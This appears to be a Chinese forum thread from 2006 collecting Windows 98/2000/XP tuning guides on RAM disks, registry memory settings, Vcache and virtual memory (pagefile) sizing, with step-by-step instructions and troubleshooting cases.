    HEKY_CURRENT_USER\Environmnet：设置当前用户的TEMP和TMP环境变量到虚拟驱动器R
    Both HKCU Shell Folders：设置当前用户的Internet临时文件到虚拟驱动器R。
    HKY\.DEFAULT keys：设置默认用户的TEMP、TMP和Internet临时文件到虚拟驱动器R
    第四步：关机，然后重启动Windows2000即可。
    小提示
    当然微软提供的RAMDISK功能相对比较简单，目前网上还有一些更为强大的内存虚拟软件，比如RamDisk等。
    2．修改注册表发挥大内存优势
    现在请打开注册表编辑器，找到[HKEY_LOCAL_MACHINE\System\CurrentControlSet\ControlSession Manager\MomoryManagement]，在右侧窗格修改一下键值(要注意的是，做一下设置的前提是内存最好超过512MB，并仅限于Windows 2000/XP)。
    (1)"LargeSystemCache"(启动大的系统缓存)：在内存中开辟一块大的内存空间用于磁盘文件系统的预读取操作。当程序连续请求的数据增加时，Windows通过系统缓存自动预读，使程序能以最快速度获取所需数据。由于启用这个系统缓冲会占用较多的物理内存，使得能被程序利用的可用物理内存减少。将其值设为1。这样，系统缓存从4MB增加到8MB。
    (2)"SecondLevelDataCache"(提高CPU性能)：CPU的处理速度要远远大于内存的存取速度，而内存又要比硬盘快得多。这样CPU与内存之间，内存与磁盘之间就形成了影响性能的瓶颈效应，前面的"LargeSystemCache"是为了缓解内存与磁盘瓶颈而设计的，而CPU为了能够迅速从内存获取处理数据也设置了一种缓冲机制L2 Cache(二级缓存)。调整这个键值能够使Windows更好地配合CPU利用该缓存机制获得更高的数据预读取命中率。建议将其设置为512
    (3)DisablePagingExecutive(禁用页面文件)：将其值改为1(十六进制)，这样将使所有程序和数据强制性限定在物理内存中运行，而不是使用虚拟内存。很明显，当有足够多的物理内存来完成所需任务时，这样做必使系统性能得到巨大的提升。对于内存仅有64MB的用户而言启用它或许就是灾难——系统频繁出错，直至崩溃。
    (4)"IOPageLockLimit"(定制输入/输出缓冲尺寸)：输入输出系统是设备和微处理器之间传输数据的通道，当扩大其缓冲尺寸时数据传递将更为流畅。同理，具体设置多大的尺寸要视物理内存的大小和运行任务多少来决定，一般来说，如果内存有64MB就可将该双字节键的16进制值设置为400(1MB)、800(2MB)或1000(4MB)128MB内存可设为1000(4MB)、2000(8MB)或4000(16MB)；256MB内存4000(16MB)或8000(32MB)。当然如果有更多内存，完全可以将其设为10000(64MB)甚至更多。当设为0时，Windows将自动配置。
    小提示
    据称，此设置还能够有效解决BT下载损伤磁盘的问题。
    3．Windows98/Me能用1GB内存吗？
    Windows98/Me不支持超过1GB以上的内存，同时，在内存超过128MB后，还需进行特别调整才能使系统更好地管理和使用内存，并避免出现大内存引发的系统故障。所有的关键设置都围绕Vcache(虚拟高速内存)。
    你知道吗？
    什么是Vcache？
    它是Windows为硬盘分配的、作为高速缓冲的物理内存，可以大大提高硬盘的读写速度，类似于DOS下的Smartdrv的用途。简单地说，Vcache 是Windows在物理内存中自动分配的一块空间，用来保存曾经使用过的，并且Windows认为还会被再次使用的代码和数据，这样当新的程序要求使用这些代码和数据时，就不必从硬盘中读取，而直接从内存中读取，这样速度会快出不少，从而大大提高系统性能。
(1)128MB~512MB
    据专家介绍，如果内存为128MB~512MB，最好用"记事本"打开c:\windows\system.ini查找[Vcache]一节，找到以"MaxFilecache="开头的一行，并设置其值为物理内存的70%(由于这里使用的数值以KB为单位，需要使用MB*1024或Bytes/1024的公式来转换数据)，比如：你的内存为128MB，那么就应该是128*0.7*1024=91750.4(约为91750KB)，该语句应写为"MaxFileCache=91750"
    (2)512MB以上内存
    有些朋友会发现，当把内存增加到512MB以上后，启动Windows98/Me或打开DOS窗口时，系统会提示"内存不足"。
    这主要是因为Windows98/Me处理大于512MB内存时存在缺陷，因此最好将Vcache的MaxFileCache值制定为512MB(524,288KB)，也就是"MaxFileCache=524288"。
    (3)1GB内存
    如果内存达到了1GB或更高，那么Windows98/Me会出现连续重启、死机或在使用Windows Update过程中不断重启的故障。
    要解决这个问题，同样是打开System.ini文件，在[386Ehh]字段添加"MaxPhysPage=40000"。这样，就可以限制Windows读取的内存控制在1GB以下。
    如果无法进入Windows，那么可在重启时一直按下Ctrl键直到出现启动菜单，接着选择"Command Prompt Only"项，在出现命令提示符后，输入"edit system.ini"并回车，接着在[386Ehh]字段添加"MaxPhysPage=40000"。
    4．关闭休眠
    很多用户喜欢休眠功能，这样可以实现快速开机功能，但对于大内存的电脑来说，在不经常读、写硬盘的情况下，最好是把硬盘休眠功能关闭，因为有时也会因此而造成无故死机故障。
    5．有大内存就可以不要虚拟内存了？
    经常看到不少文章介绍，再有了大内存后，就可以将虚拟内存禁用掉。其实不然！比如：Windows98/Me对大于512MB的内存有先天不足，大于这个数量的内存，Windows98会出现不稳定及启动速度变慢的情况。如果使用了大内存加上禁用虚拟内存，不稳定因素将会进一步增加。
    另外，Windows本身的设计是，一旦发现有进程转入不活动状态，就会把分配给它的内存空间映射到交换文件中，尽可能空出物理内存给其他活动的进程，并不是用完物理内存才开始动用交换文件。因为如果等到物理内存用完再调用，就已经太迟了。在配制较低的电脑上势必造成数据传输和处理停滞。所以禁止虚拟内存从原则上来讲，最易引起Windows异常，及时不出现运行不了的故障，也会频繁提示虚拟内存不够，请重新设置云云。
    你知道吗？
    据华硕专家介绍，在使用INTEL 850/850E芯片组的主板时，如果搭配了2GB RAMBUS内存后，电脑会出现不稳定现象。这是由于Intel850/850E芯片组的限制，Intel的建议为：内存条数*每个内存上的晶片数≤24颗。而目前国内销售的RAMBUS 256内存的晶片数是8颗，Rambus512MB内存的晶片数就是16颗，所以当用户使用了过大的内存时都有可能出现不稳定现象。
    6．让大内存为硬盘助力
    如果你拥有了超过512MB的内存，并且还有一块迈拓或昆腾硬盘，那么Maxtor公司推出的MaxBoost值得一试，据称，它能大幅提升硬盘性能，最大可以提升约60%的硬盘性能。该软件其实是一块磁盘驱动，替换了Windows2000/XP的磁盘驱动，能针对不同应用软件自动在系统内存中设置一个适合大小的缓存，在读写数据前起到预读和缓冲作用，利用磁盘读写数据以一种不肯公布技术细节的"高级算法"，从而有效的提升硬盘读写速度，达到提升应用程序和系统速度的目的。据一些专家介绍，该软件虽然没有官方宣称的那样神奇，但确实在文件复制等操作方面大显身手。当然由于MaxBoost还处于测试阶段，所以仍存在一些问题，所以建议普通玩家在该软件正式推出后再使用。


设置虚拟内存

《一键清理系统垃圾》

设置虚拟内存

    虚拟内存的概念是相对于物理内存而言的，当系统的物理内存空间入不敷出时，操作系统便会在硬盘上开辟一块磁盘空间当做内存使用，这部分硬盘空间就叫虚拟内存。Windows 98中采用Win386.swp文件的形式，而Windows 2000/XP则采用页面文件pagefile.sys的形式来管理虚拟内存。
    一、大小情况
    1.一般情况
    一般情况下，建议让Windows来自动分配管理虚拟内存，它能根据实际内存的使用情况，动态调整虚拟内存的大小。
    2.关于最小值
    Windows建议页面文件的最小值应该为当前系统物理内存容量再加上12MB，而对于物理内存容量小于256MB的用户，则建议将页面文件的最小值设得更大些：
    ①使用128MB或者更少内存的用户，建议将当前物理内存容量的1.75倍设置为页面文件的最小值。
    ②内存大小在128MB到256MB之间的用户，建议将当前物理内存容量的1.5倍设置为页面文件的最小值。
    3.关于最大值
    一般来说，页面文件的最大值设置得越大越好，建议设置为最小值的2到3倍。
    4.极端情况
    假如硬盘空间比较紧张，在设置页面文件时，只需保证它不小于物理内存的3/4即可。

    如果物理内存很大(大于512MB)，则可以将虚拟内存禁用。(上海 任亚维)
    5.根据不同的任务环境设置
    ①以3D游戏为主的环境
    3D游戏对CPU、显卡和内存要求都很高，如果物理内存小于256MB，建议把虚拟内存预设得大一点，这对提高游戏的稳定性和流畅性很有帮助。
    ②以播放视频为主的环境
    视频应用对硬盘空间的“胃口”很大，不过千万不要像在3D游戏环境中一样把虚拟内存设得很大，尤其是Windows XP的用户。因为Windows XP不会自动把不需要的空间释放掉，也就是说那个Pagefiles.sys文件会越来越大。如果你把虚拟内存和Windows XP放在同一分区，播放RM、ASF等视频流文件以后，系统经常会提示你虚拟内存设得太小或是磁盘空间不足。查看此时的页面文件，已经足有1GB大小了。所以建议经常欣赏视频文件的Windows XP用户，把初始数值设小一点，或者将虚拟内存转移到系统盘以外的分区。
    二、设置方法
    下面以在Windows XP下转移虚拟内存所在盘符为例介绍虚拟内存的设置方法：进入“打开→控制面板→系统”，选择“高级”选项卡，点击“性能”栏中的“设置”按钮，选择“高级”选项卡，点击“虚拟内存”栏内的“更改”按钮，即可进入“虚拟内存”窗口；在驱动器列表中选中系统盘符，然后勾选“无分页文件”选项，再单击“设置”按钮；接着点击其他分区，选择“自定义大小”选项，在“初始大小”和“最大值”中设定数值，然后单击“设置”按钮，最后点击“确定”按钮退出即可。


双系统共用虚拟内存

《一键清理系统垃圾》

双系统共用虚拟内存

    虚拟内存的设置，不能不涉及到页面文件。所谓页面文件，它的功能是将一部分硬盘空间设置为虚拟内存，从而扩大了可用“内存”空间，以此来满足程序的运行要求。Win9x通常是利用安装目录中的Win386.swp这个交换文件来实现虚拟内存的创建，WinNT则是利用Pagefile.sys来实现这一功能的。既然它们都是功能一样的文件，为了方便和节约空间让其共享是可行的。

    相关的Windows系统非常简单，比如Win98和WinMe，WinNT和Win2000，WinNT和WinXP只要将它们的路径设置成相同的即可。具体方法为：依次点击“开始→设置→控制面板→系统→性能→虚拟内存”，选中“用户自己指定虚拟内存设置”，将“硬盘”路径指定为空间大的分区如“C:\2500MB可用”，并且将最大值和最小值设为相同即可。需要说明的是在第二个系统中设定时，最好删掉上一个系统的相同文件。

    不相关的Windows系统共享的前提条件是：首先需要保证有相同的文件系统(Win9x/Me不识别NTFS分区)，其次这两个文件的大小必须设定一致，也就是说它们的最大值和最小值必须相同，最后这两个文件的位置应在同一个分区的同一个目录下。

    我们可以有两种方法来共享虚拟内存文件：

    1.共享WinNT的Pagefile.sys
    启动Win98/Me系统，单击“开始→运行”，键入“systm.ini”，在[386enh]下做如下修改："pagingDrive=c:\pagefile.sys" (位置由自己设定)

    "minpaging file size=x"(如果虚拟内存为192MB，则x=192×1024=196608，推荐设为物理内存的2.5倍)

    接下来重新启动计算机，删掉“win386.swp”文件，不能删除表明设置失败。

    2.共享Win98/Me的win386.swp
    进入Win2000/XP，单击“开始→运行”，输入“regedit”，打开注册表，然后通过“查找”功能，查找关于“filepage.sys”的所有项，然后将所有的“filepage.sys”都更改为“win386.swp”。

    相关键为：

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SessionManager\Memory Management]

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\BackupRestore\FilesNotToBackup]

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager\Memory Management]

    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Control\BackupRestore\FilesNotToBackup]

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToBackup]

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]

    最后重新启动计算机，然后删掉“pagefile.sys”就可以了。


虚拟内存常见问题的解决办法

《一键清理系统垃圾》

虚拟内存常见问题的解决办法

    我们在设置、使用“虚拟内存”时候，也会遇到一些问题，可能很多人都选择重新安装操作系统来解决人为的设置错误。其实，我们完全可以不重装操作系统就可以解决问题。

    不能设置“虚拟内存”

    问题：一台多用户使用的电脑，各用户均以自己的用户名登录到系统（Windows XP专业版），不同的用户均被设置有不同的权限；在管理员设置好各驱动器的“安全”属性之后，发现系统的“虚拟内存”不能更改大小，也不能设置在非操作系统文件所在的区（该区没有更改“安全属性”）。

    分析：在这种情况下，系统开机或关机均没有相关提示信息，系统能正常运行，但是，我们设置在其它分区中的“pagefile.sys”竟可以任意删除，而不会弹出警告信息。经过查看注册表，我们发现“虚拟内存”设置并没有问题，而且，在注册表修改它的值后，重新启动电脑后更改也不会生效。通过查看各分区的“安全”属性，我们发现，各个分区均设置为某一个人专用，导致更改“虚拟内存”到该分区不能生效。

    解决：以管理员身分登录到系统，打开“我的电脑”，选择我们需要设置“虚拟内存”的分区，右击它，选择“属性”、“安全”，再点击“添加”，以添加组或用户。然后，在“选择对象类型”窗口中，输入“system”，再点击“确定”按钮，并且在随后弹出的窗口中将它的权限设置为“完全控制”为“允许”。现在，我们就可以在这个分区上设置“虚拟内存”了。

    登录即警告

    问题：一台Dell 4400的原装机（使用Intel主板芯片组，操作系统为Windows XP专业版），在登录到系统时即弹出页面文件太小或不存在的警告信息，不能运行任何程序。

    分析：使用以上方法查看“虚拟内存”的大小，发现它的值在任何分区均没有设置；设置好后重新启动电脑，它的值仍然为“0”。打开“注册表编辑器”，找到以下值：

    [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Session Manager\Memory Management]下的“PagingFiles”，发现它的值正是我们设置好的，只是没有起作用。同时，我们在任何分区中均没有找到“pagefile. sys”（已修改“文件夹”的相关参数，可以查看系统文件和隐藏文件）。

    在系统分区中有足够的自由空间，各分区的“安全”属性均没有修改，为什么也会导致不能设置虚拟内存呢？我们发现管理员曾经在本台电脑上安装Intel的“Application Accelerator”应用程序，而且它的版本比较低，为2.1。

    解决：经过查看Intel公司的网页后，我们发现了相关的重要信息，低版本的“Application Accelerator”可能会导致磁盘存取问题！于是，下载最新版本的该程序，卸载掉原来的老程序，再安装新的，重新启动电脑后一切正常！久违的虚拟内存又回到它的家园。


虚拟内存设置终极攻略

《一键清理系统垃圾》

虚拟内存设置终极攻略

榨干性能！虚拟内存设置终极攻略
本文详细介绍了虚拟内存的设置和相关问题的解决方法。
    内存在计算机中的作用很大，电脑中所有运行的程序都需要经过内存来执行，如果执行的程序很大或很多，就会导致内存消耗殆尽。为了解决这个问题，Windows中运用了虚拟内存技术，即拿出一部分硬盘空间来充当内存使用，当内存占用完时，电脑就会自动调用硬盘来充当内存，以缓解内存的紧张。举一个例子来说，如果电脑只有128MB物理内存的话，当读取一个容量为200MB的文件时，就必须要用到比较大的虚拟内存，文件被内存读取之后就会先储存到虚拟内存，等待内存把文件全部储存到虚拟内存之后，跟着就会把虚拟内里储存的文件释放到原来的安装目录里了。
    当系统运行时，先要将所需的指令和数据从外部存储器(如硬盘、软盘、光盘等)调入内存中，CPU再从内存中读取指令或数据进行运算，并将运算结果存入内存中，内存所起的作用就像一个“二传手”的作用。当运行一个程序需要大量数据、占用大量内存时，内存这个仓库就会被“塞满”，而在这个“仓库”中总有一部分暂时不用的数据占据着有限的空间，所以要将这部分“惰性”的数据“请”出去，以腾出地方给“活性”数据使用。这时就需要新建另一个后备“仓库”去存放“惰性”数据。由于硬盘的空间很大，所以微软Windows操作系统就将后备“仓库”的地址选在硬盘上，这个后备“仓库”就是虚拟内存。在默认情况下，虚拟内存是以名为Pagefile.sys的交换文件保存在硬盘的系统分区中。
    手动设置虚拟内存
    在默认状态下，是让系统管理虚拟内存的，但是系统默认设置的管理方式通常比较保守，在自动调节时会造成页面文件不连续，而降低读写效率，工作效率就显得不高，于是经常会出现“内存不足”这样的提示，下面就让我们自已动手来设置它吧。
    ①用右键点击桌面上的“我的电脑”图标，在出现的右键菜单中选择“属性”选项打开“系统属性”窗口。在窗口中点击“高级”选项卡，出现高级设置的对话框.
    ②点击“性能”区域的“设置”按钮，在出现的“性能选项”窗口中选择“高级”选项卡，打开其对话框。
    ③在该对话框中可看到关于虚拟内存的区域，点击“更改”按钮进入“虚拟内存”的设置窗口。选择一个有较大空闲容量的分区，勾选“自定义大小”前的复选框，将具体数值填入“初始大小”、“最大值”栏中，而后依次点击“设置→确定”按钮即可，最后重新启动计算机使虚拟内存设置生效。
    建议:可以划分出一个小分区专门提供给虚拟内存、IE临时文件存储等使用，以后可以对该分区定期进行磁盘整理，从而能更好提高计算机的工作效率。
    一、量身定制虚似内存
    1.普通设置法
    根据一般的设置方法，虚拟内存交换文件最小值、最大值同时都可设为内存容量的1.5倍，但如果内存本身容量比较大，比如内存是512MB，那么它占用的空间也是很可观的。所以我们可以这样设定虚拟内存的基本数值:内存容量在256MB以下，就设置为1.5倍;在512MB以上，设置为内存容量的一半;介于256MB与512MB之间的设为与内存容量相同值。
    2.精准设置法
    由于每个人实际操作的应用程序不可能一样，比如有些人要运行3DMAX、Photoshop等这样的大型程序，而有些人可能只是打打字、玩些小游戏，所以对虚拟内存的要求并不相同，于是我们就要因地制宜地精确设置虚拟内存空间的数值。
    ①先将虚拟内存自定义的“初始大小”、“最大值”设为两个相同的数值，比如500MB;
    ②然后依次打开“控制面板→管理工具→性能”，在出现的“性能”对话框中，展开左侧栏目中的“性能日志和警报”，选中其下的“计数器日志”，在右侧栏目中空白处点击右键，选择右键菜单中的“新建日志设置”选项;
    ③在弹出的对话框“名称”一栏中填入任意名称，比如“虚拟内存测试”。在出现窗口中点击“添加计数器”按钮进入下一个窗口;
    ④在该窗口中打开“性能对象”的下拉列表，选择其中的“Paging File”，勾选“从列表中选择计数器”，并在下方的栏目中选择“%Usage Peak”;勾选“从列表中选择范例”，在下方的栏目中选择“_Total”，再依次点击“添加→关闭”结束
    ⑤在右侧栏目中可以发现多了一个“虚拟内存测试”项目，如果该项目为红色则说明还没有启动，点击该项，选择右键菜单中的“启动”选项即可
    接下来运行自己常用的一些应用程序，运行一段时间后，进入日志文件所在的系统分区下默认目录“PerfLogs”，找到“虚拟内存测试_000001.csv”并用记事本程序打开它，在该内容中，我们查看每一栏中倒数第二项数值，这个数值是虚拟内存的使用比率，找到这项数值的最大值，比如图中的“46”，用46%乘以500MB(前面所设定的虚拟内存数值)，得出数值为230MB。
    用该数值可以将初始大小设为230MB，而最大值可以根据磁盘空间大小自由设定，一般建议将它设置为最小值的2到3倍。这样我们就可以将虚拟内存打造得更精准，使自己的爱机运行得更加流畅、更具效率。
    二、Windows虚拟内存加速密籍
    虚拟内存对于任何版本的Windows而言都是十分重要的。如果设置得当，它将极大地提升电脑的性能和运行速度。可是在默认状态下，Windows始终将虚拟内存设为物理内存的1.5倍。这样的话，如果用户安装2GB的内存，系统就会腾出高达3GB的硬盘空间作为虚拟内存。但以当前的主流应用软件和游戏对内存的需要来看，根本没有必要使用这么多的虚拟内存。那么，有没有什么秘技或绝招可使虚拟内存运用得更有效率或更显性能呢?
    1、分割存于多个硬盘
    将虚拟内存设在较快的硬盘上，的确可使虚拟内存的运作更有效率。但是若电脑上两个硬盘速度一样快，则应将虚拟内存平均分配在两个不同的硬盘上(并非同一硬盘的不同分区)。因为同步进行读写操作会更有效地提高系统整体的虚拟内存性能。
    举个例子，假设你原本在硬盘C上设置了700MB的虚拟内存，现在你可尝试重新分配，即把硬盘C改为350MB，硬盘D新增350MB的虚拟内存。理论上这样做会加快虚拟内存整体的读写操作.
    2、硬盘需有足够空间
    如果你不是很有经验的电脑用户，又或者没有特殊的使用要求，在Windows XP中选择“系统管理的大小”的方法来自动处理虚拟内存，一般情况下应该会比选择“自定义大小”的方法来得安全和稳定。不过，有一点大家必须注意，由于虚拟内存的“页面文件”(pagefile.sys)会随着电脑使用过程进行收缩和扩展，为使系统管理虚拟内存能够进行得顺利和更具弹性，我们必须保证分页文件所在的硬盘拥有足够的可用空间。
    3、最小值等于最大值
    选择“自定义大小”的方法来处理虚拟内存，并将最大值和最小值都设为同一数值。有很多人都相信用这种方法来处理虚拟内存有助于提高系统的性能。他们所持的理由是，当最大值和最小值都相等时，系统无需时刻进行收缩和扩展页面文件的动作。省去了这些工作，相应地就是提高系统效率。
    这种方法，很多人坚信有效，但同样地，也有人指出其实并没有效果。但不管怎样也好，如要将最大值和最小值设为相等，我们必须坚守一个原则，那就是虚拟内存的大小必须足够，否则系统轻则会出现效率下降(要进行更多复写动作来腾出空间)，严重的更会造成系统不稳定。
    4、整理页面文件
    文件数据保存在硬盘上久了，文件碎片(fragment)自然会产生。要保持或提高硬盘的工作效率，我们应不时为硬盘进行一次碎片整理。所谓虚拟内存，其实也是硬盘上的资料文件，那么虚拟内存是否也应该像普通文件般需要整理呢?
    Windows系统处理页面文件(即虚拟内存)的方法有别于一般的文件。相比之下，页面文件比一般文件更少出现碎片，为页面文件进行整理通常是没有必要的。事实上，当Windows XP进行磁盘碎片整理时，页面文件不会牵涉其中。
    虽然Windows不会对页面文件进行整理，但事实上页面文件也有碎片存在。追求“尽善尽美”的朋友可能仍想对页面文件进行碎片整理。大家不妨试试下面的方法:
    在桌面“我的电脑”图标上单击鼠标右键，在随后出现的功能菜单中选“属性”。进入系统属性的设置窗口，用鼠标点选“高级”-->“性能”-->“设置”-->“高级”-->“更改”，在随后出现的“虚拟内存”设置窗口中选中“无分页文件”一项。最后单击“设置”按钮退出，并重新启动电脑。

--------------------------------------------------------------------------------
作者: jianggg　　时间: 2006-7-6 09:10

  重新启动后，检查一下磁盘根目录中还有没有pagefile.sys页面文件存在，如有就将之删除。清除掉虚拟内存的页面文件后，现在我们再进行磁盘碎片整理。完成后，按照前面的步骤重新设置一定数量的虚拟内存，并启动电脑使之生效。经上述方法处理后，新得出的页面文件将会是没有碎片的。
    另外，如果想查看页面文件碎片的具体情况呢?启动磁盘碎片整理程序，为存在有页面文件的硬盘进行一次“分析”，再点选“查看报告”，看看“页面文件碎片”一栏便会一目了然.
    5、虚拟内存的理想大小
    想以“自定义大小”的方法来处理虚拟内存，究竟应该设置多大的虚拟内存呢?在Windows XP中，如果由操作系统自己定义虚拟内存，系统通常会把最小值设置为物理内存的1.5倍。当扩展时，最大值则介于物理内存的2.5至3倍。一般情况下，用户想自定义虚拟内存的大小，均可参照这个比例设置。
    真的要参照这个比例吗?如果我的电脑上有1GB的内存，难不成最小值要设置为1.5GB，最大值是2.5至3GB。这样一来。Pagefile.sys页面文件至少为1.5GB，太不现实了!
    其实，大内存的系统跟小内存的系统相比，在设置虚拟内存时，标准有些不同。
    如果大家有512MB以上甚至1GB的内存，既然物理内存已经相当充足，所需的虚拟内存反而应该减少。故在大内存的系统中，虚拟内存的最小值可以设成物理内存的一半。比如有1GB的内存，虚拟内存的最小值设成512MB，最大值则维持3GB以备不时之需。注意:虽然最大值设为3GB，系统是不会立即出现3GB大小的pagefile.sys文件，实际上它首先会以最小值出现，待有扩展需要时才会递增。
    另外，有些大内存的朋友，可能会干脆不设置虚拟内存，以此强迫系统使用速度较快的内存。其实这是不太明智的做法。正所谓凡事都不要做得太绝对，完全没有虚拟内存也不行。原因是不少应用程序在设计时要求必须使用虚拟内存，没有了就会造成系统不稳定或死机。
    至于小内存的系统，例如256MB，参照1.5倍及3倍的设置比例最稳当。即虚拟内存最小值设为384MB，最大值768MB。
    6、手工订制最准确的虚拟内存
    0.5倍、1.5倍、3倍，哇!好像买衣服时分大、中、小号，完全没有个性。究竟设置虚拟内存有没有更“贴身剪裁”的方法呢?
    在Windows XP桌面的“开始”→“运行”中输入perfmon.msc，一个与系统性能有关的监视器便会出现。看看显示器的底部，有三个计数器(pages/sec、Avg.Disk Queue Length及rocessor Time，)。为了便于我们接下来对虚拟内存的页面文件进行精确监测，现在请大家将这三个计数器逐一点选，并按键盘上的Delete键将它们删除。请大家放心，删除后，下次再启动系统性能监视器时，这三个项目会重新出现。
    删除后，现在请在图表中央位置单击鼠标右键，在随后出现的功能菜单中点选“添加计数器”一项，跟着在跳出窗口的“性能对象”一栏选“Process”。之后再在“从列表选择”一栏中点选“Page File Bytes”。不清楚“Page File Bytes”代表什么意思，只要单击“说明”按钮，解说文字便会出现在对话框之下。
    选定“Page File Bytes”后，再在右方的“从列表选择范例”一栏选取“Total”项，之后依次单击“添加”和“关闭”按钮，一个名为“Page File Bytes”的计数器便会出现在性能监视器的下方中。
    重复以上的动作，再添加一个名为“Page File Bytes Peak”的计数器(即Process下面的Page File Bytes Peak)。
    现在，回头看一下监视器，图表中应该正在显示并计量着刚才新增加的两个计数器。如无意外，这两个计数器在图表上的显示不正确，即数值靠近最高比例线，没有动态变化。不用怕，这并不表示你的电脑出了什么问题，而是图表比例设得不太恰当而已!用鼠标右键逐一单击监视器底部的“Page Fele Bytes”和“Page File By8tes Peak”计数器，并选“属性”一项。在“数据”页面的“比例”一栏中改为0.0000001，这样显示器中的图表便不再是没有动静了。
    如果你看过系统提供的说明，相信应该知道“Page File Bytes”和“Page File Bytes Peak”正是代表了系统监测期间所使用的虚拟内存及其峰值是多大。因此，需要精确地手工设置虚拟内存，可参考图表下方显示的数字，其单位是Bytes
    想知道在正常的情况下，你的系统会耗用多少虚拟内存?请将平时日常使用的应用软件同时启动并让它们开始工作，接着再看性能监视器上所显示的数值，心中有数了吧。
    人总有疯狂的时候，想知道自己疯狂使用电脑时系统需要多少虚拟内存，现在就尽情地将电脑上的程序启动并运行(例如，开十多个IE浏览器窗口上网，播放MP3和DVD影片，再进行光盘刻录或DV影片压缩编码)，看看监视器的百分比会升高到多少。
    在图表上右击鼠标，点选“属性”，进入“图表”页面勾选“水平格线”一项。这样图表中会出现一条条的水平分割线，是不是好分辨了?
    图表中的红色垂直线跑得太快，来不及开启电脑上的程序进行测试?
    同样，在图表上单击鼠标右键，选“属性”，在常规页面的“自动抽样间隔”一项中将1秒改为5秒。此时，图表中的“图形时间”数值便会由1分40秒变成8分20秒。换言之，红色垂直线走完一圈需花费8分20秒，这个时间应该足以让大家开启并运行很多应用程序，然后再慢慢查看图表中的结果。
    最后，通过监视器的图表，相信大家已经能粗略估计你的电脑系统应设置多大的虚拟内存了。
    三、出现“虚拟内存不够”的几个可能
    1、感染病毒
    有些病毒发作时会占用大量内存空间，导致系统出现内存不足的问题。赶快去杀毒，升级病毒库，然后把防毒措施做好!
    2、虚拟内存设置不当
    虚拟内存设置不当也可能导致出现内存不足问题，一般情况下，虚拟内存大小为物理内存大小的2倍即可，如果设置得过小，就会影响系统程序的正常运行。重新调整虚拟内存大小以WinXP为例，右键点击“我的电脑”，选择“属性”，然后在“高级”标签页，点击“性能”框中的“设置”按钮，切换到“高级”标签页，然后在“虚拟内存”框中点击“更改”按钮，接着重新设置虚拟内存大小，完成后重新启动系统就好了。
    3、系统空间不足
    虚拟内存文件默认是在系统盘中，如WinXP的虚拟内存文件名为“pagefile.sys”，如果系统盘剩余空间过小，导致虚拟内存不足，也会出现内存不足的问题。系统盘至少要保留300MB剩余空间，当然这个数值要根据用户的实际需要而定。用户尽量不要把各种应用软件安装在系统盘中，保证有足够的空间供虚拟内存文件使用，而且最好把虚拟内存文件安放到非系统盘中。
    4、因为SYSTEM用户权限设置不当
    基于NT内核的Windows系统启动时，SYSTEM用户会为系统创建虚拟内存文件。有些用户为了系统的安全，采用NTFS文件系统，但却取消了SYSTEM用户在系统盘“写入”和“修改”的权限，这样就无法为系统创建虚拟内存文件，运行大型程序时，也会出现内存不足的问题。问题很好解决，只要重新赋予SYSTEM用户“写入”和“修改”的权限即可，不过这个仅限于使用NTFS文件系统的用户。
    四、虚拟内存的优化
    1. 启用磁盘写入缓存
    在“我的电脑”上单击鼠标右键选择“属性->硬件”，打开设备管理器找到当前正在使用的硬盘，单击鼠标右键选择属性。在硬盘属性的的“策略”页中，打开“启用磁盘上的写入缓存”。
    这个选项将会激活硬盘的写入缓存，从而提高硬盘的读写速度。不过要注意一点，这个功能打开后，如果计算机突然断电可能会导致无法挽回的数据丢失。因此最好在有UPS的情况下再打开这个功能。当然，如果你平常使用计算机时不要进行什么重要的数据处理工作，没有UPS也无所谓，这个功能不会对系统造成太大的损失。
    2. 打开Ultra MDA
    在设备管理其中选择IDE ATA/ATAPI控制器中的“基本/次要IDE控制器”，单击鼠标右键选择“属性”，打开“高级设置”页。这里最重要的设置项目就是“传输模式”，一般应当选择“DMA(若可用)”。
    3. 配置恢复选项
    Windows XP 运行过程中碰到致命错误时会将内存的快照保存为一个文件，以便进行系统调试时使用，对于大多数普通用户而言，这个文件是没有什么用处的，反而会影响虚拟内存的性能。所以应当将其关闭。
    在“我的电脑”上单击鼠标右键，选择“属性->高级”，在“性能”下面单击“设置”按钮，在“性能选项”中选择“高级”页。这里有一个“内存使用”选项，如果将其设置为“系统缓存”，Windows XP 将使用约4MB的物理内存作为读写硬盘的缓存，这样就可以大大提高物理内存和虚拟内存之间的数据交换速度。默认情况下，这个选项是关闭的，如果计算机的物理内存比较充足，比如256M或者更多，最好打开这个选项。但是如果物理内存比较紧张，还是应当保留默认的选项。
    页面文件的设置
    页面文件的大小计算
    对于不同的计算机而言，页面文件的大小是各不相同的。关于页面文件大小的设置，有两个流传甚广的“公式”，“物理内存X2.5”或者“物理内存X1.5”。这两种计算方法固然简便，但是并不适用于所有的计算机。设置页面文件大小最准确的方法是看看计算机在平常运行中实际使用的页面文件大小。
    通过Windows XP自带的日志功能可以监视计算机平常使用的页面文件的大小，从而进行最准确的设置，具体步骤如下。
    一、在“我的电脑”上单击鼠标右键，选择“属性->高级”，单击“性能”下面的“设置”按钮，然后选择“高级”页，单击“虚拟内存”下方的“更改”按钮。选择“自定义大小”，并将“起始大小”和“最大值”都设置为300M，这只是一个临时性的设置。设置完成后重新启动计算机使设置生效。
    二、进入“控制面板->性能与维护->管理工具”，打开“性能”，展开“性能日志和警告”，选择“计数器日志”。在窗口右侧单击鼠标右键选择“新建日志设置”
    三、随便设置一个日志名称，比如“监视虚拟内存大小”。
    四、在“常规”页中单击“添加计数器”按钮。
    在“性能对象”中选择“Paging File”，然后选中“从列表选择记数器”下面的“%Usage Peak”，并在右侧“从列表中选择范例”中选择“_Total”。最后单击“添加”和“关闭”按钮。
    五、别忘了记住“日志文件”页中的日志文件存放位置和文件名，我们后面需要查看这个日志来判断Windows XP平常到底用了多少虚拟内存，在这个例子中，日志文件被存放在D:\Perflog目录下。
    另外还要设置“日志文件类型”为“文本文件”，这样便于阅读。
    这时你可以看到刚才新建的日志条目前面的图标变成了绿色，这表明日志系统已经在监视虚拟内存了。如果图标还是红色，你应该单击鼠标右键选择“开始”来启动这个日志。
